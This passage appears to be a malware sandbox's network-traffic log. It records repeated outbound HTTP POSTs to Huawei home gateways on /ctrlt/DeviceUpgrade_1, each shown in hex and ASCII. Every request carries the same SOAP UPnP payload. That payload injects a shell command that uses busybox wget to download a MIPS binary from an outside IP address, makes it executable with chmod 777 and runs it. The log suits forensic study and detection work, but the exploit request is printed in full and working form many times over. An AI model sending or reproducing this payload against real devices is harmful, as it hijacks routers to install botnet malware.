                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:03.111864090 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          180192.168.2.235281649.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:16.208700895 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 31 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:15Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          181192.168.2.2348376156.253.36.637215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:16.442516088 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:17.966195107 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:19.757950068 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:23.437449932 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:30.604446888 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:44.938446045 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:13.350416899 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
